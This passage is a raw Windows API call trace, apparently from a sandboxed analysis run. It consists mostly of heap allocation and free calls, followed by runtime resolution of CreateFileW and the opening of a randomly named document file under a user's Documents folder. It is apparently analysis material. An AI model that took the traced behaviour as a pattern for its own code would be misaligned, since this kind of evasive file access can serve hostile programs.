Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0080.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0080.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0080.026] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0080.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0080.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.029] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0080.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0080.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.031] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0080.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0080.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.032] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0080.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.033] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\ltd44h.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0080.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 